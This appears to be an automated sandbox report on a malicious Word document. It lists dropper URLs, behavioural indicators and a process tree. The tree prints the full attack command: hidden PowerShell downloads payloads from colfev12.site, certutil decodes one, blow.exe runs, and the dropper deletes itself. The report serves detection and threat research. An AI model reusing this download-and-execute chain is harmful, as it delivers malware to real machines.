Analysis
-
max time kernel
141s -
resource
win10v191014 -
submitted
05-12-2019 20:53
Task
task1
Sample
Docs_92ebafcc950619596e93a4215d05e6cb.doc
Resource
win7v191014
0 signatures
General
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://colfev12.site/Bijka.dat
exe.dropper
http://colfev12.site/sfera.dat
exe.dropper
http://colfev12.site/oYWE.dat
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 4556 created 2500 4556 svchost.exe blow.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid process 3396 WerFault.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
blow.exedescription pid process target process PID 4104 set thread context of 2500 4104 blow.exe blow.exe -
Processes:
description ioc Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060 Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060\Blob = 0300000001000000140000000217922ca1b6f0bd0f1d7ff6e7bdc29b2faaa06020000000010000001e0300003082031a308202daa003020102020900bebbcc34c2a99a43300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3133303730323231313033375a170d3138303730313231313033375a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b63082012b06072a8648ce3804013082011e02818100f3e2f36f1d350881275aa7c5f7e8c357a650ef20dc32b53ca779842dcbfc152228c1e764019c55ca7bf8a0116ccca93636dc681161c8188f79f985cce6b1a8aaf44dffd3ea6c2d60fd80eefd084c4a09c4b9784cf3ccf638ca8cca937fbaee6d472cad4ee2d5ddda4e653184e512d9846c770abdc5e4945ce5686c513bf38f150215009fd788154563df5ca8c78a354278fc70394e37fb0281803a769d0b37f784c6f1af668ffa7b2d0b53debfac0e64db8244f4c1793e9e34cac020047d3df0563ddefd171ab2fd6af49f7d3616c285cc422590c3a6f0cae0dd3987c3f310a5efe0f127f406416e983ec649e835e1006e2fccf48474b90e82cb67cb62608ed42f2ec45b71803d63dbd63101b8a490fd1ab091976ef4bb176a65038184000281806ed2b8b1d12b8846c32236833769cb554bcd3809bfd684c8bdacfb500ca500327185560ccc83d9ae13580fa72aa9fd36eccaa9fd79861245cc591b4e7dcf047847e82d5946829638473927236142f9aa5d99ec33714677492e39784264f486ada6b028837db599a58e512e376c52470b1cb8991793783499e772de6678db2be3a38198308195301d0603551d0e0416041446d2c25b3e033423792e171c0019284c71102b6430530603551d23044c304a801446d2c25b3e033423792e171c0019284c71102b64a127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bebbcc34c2a99a4330120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c02140b7937349b7de4b8750855cd40ef4bbb2d3145a9021417408a13071294c11b2c9e5195e411eb86a54864 Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6 Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6\Blob = 0300000001000000140000002c85006a1a028bcc349df23c474724c055fde8b620000000010000001f0300003082031b308202dba003020102020900bea900b78b6470ef300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3136303530393230343035355a170d3231303530383230343035355a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b73082012c06072a8648ce3804013082011f02818100a9a733a14a9c9d68b075811ddf231c514c0cdc328087287fd11f1d6eb125b536b88cd5579591bb6e7545b45b98eaa8cdeb0ae38be4781c7d36d97b3d2bb45b9449142130f68e112c6d09e343160cd0d0fbb8aabc8b0cea5b2066b0e3368589dadfd8ae79e9d2bdc5f5836d8fb278be02c260d3a592bda471f1a28e2f925e8b57021500a86236ce56c046d8f3fac8a6bb63e28543e45753028181009eb2085cfbe32af5a25dddeebdeede0d2f2a4475bbca802c7952e078421b4b85528fff6242aba7c75c1e40695db3be422d982972b638679c1b9314a39cad44577d2a71ee3e5738176062d9200be5efcc1b00c16b1b48e8b1771c01b9aa54ce0b5f6679caed531293d92ef822695e20264e23b188489ea3e6dc1c36a90fa0668903818400028180168cdc3d074cf4c9accef116317b85adf100f2454c9ca23203ad296928bb08879c48096c44bcb0dc3f49f69456e871dd45980eacabe735c63ade0281e7a48aca3eabde71aab64c04a6ef72c352be936692c8970a3c7615370d549b931c289810278f5284914f6965df0d93ce0a980ca5dce26e75a331c4da939af3e051d252d3a38198308195301d0603551d0e04160414a353ea5503cd0a69c45870b6ffe3912091c79f7a30530603551d23044c304a8014a353ea5503cd0a69c45870b6ffe3912091c79f7aa127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bea900b78b6470ef30120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c021468e7a7cdfca81ff04d476fa11b781b7696d1fbf402145ef1c64374ebde4c309b59a9deeb99e556fd1477 -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS -
Checks for installed software on the system 1 TTPs 65 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayName Key enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName Key opened \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName Key opened \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName Key opened \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName Key opened \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayName Key opened \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName Key opened \REGISTRY\USER\S-1-5-21-634046074-2673730973-2644684987-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName Key enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
SppExtComObj.exepowershell.exeblow.exeblow.execmd.exesvchost.exedescription pid process target process PID 3660 wrote to memory of 4644 3660 SppExtComObj.exe SLUI.exe PID 4028 wrote to memory of 4104 4028 powershell.exe blow.exe PID 4104 wrote to memory of 2500 4104 blow.exe blow.exe PID 2500 wrote to memory of 4824 2500 blow.exe cmd.exe PID 4824 wrote to memory of 4788 4824 cmd.exe PING.EXE PID 4556 wrote to memory of 3396 4556 svchost.exe WerFault.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
blow.exepid process 2500 blow.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3492 powershell.exe Token: SeDebugPrivilege 4028 powershell.exe Token: SeRestorePrivilege 3396 WerFault.exe Token: SeBackupPrivilege 3396 WerFault.exe Token: SeDebugPrivilege 3396 WerFault.exe -
Executes dropped EXE 2 IoCs
Processes:
blow.exeblow.exepid process 4104 blow.exe 2500 blow.exe -
Processes:
description ioc Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0" Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1" -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT svchost.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4924 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exeblow.exeWerFault.exesvchost.exepid process 3492 powershell.exe 4028 powershell.exe 4104 blow.exe 3396 WerFault.exe 4556 svchost.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_92ebafcc950619596e93a4215d05e6cb.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:4924
-
C:\Windows\system32\cmd.execmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" & certutil -decode %temp%\dera %temp%\dera.exe & powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe1⤵PID:4520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3492
-
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\AppData\Local\Temp\dera C:\Users\Admin\AppData\Local\Temp\dera.exe2⤵PID:3748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\blow.exe"C:\Users\Admin\AppData\Local\Temp\blow.exe" dera.exe3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4104 -
C:\Users\Admin\AppData\Local\Temp\blow.exe"C:\Users\Admin\AppData\Local\Temp\blow.exe"4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
PID:2500 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\blow.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:4824 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4788
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 13565⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3396
-
-
-
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4644
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Drops file in Windows directory
PID:4740
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
PID:4556
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵PID:4448
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:1376
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wisvc1⤵PID:1868
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DoSvc1⤵PID:2472
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup1⤵PID:2504
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc1⤵PID:2672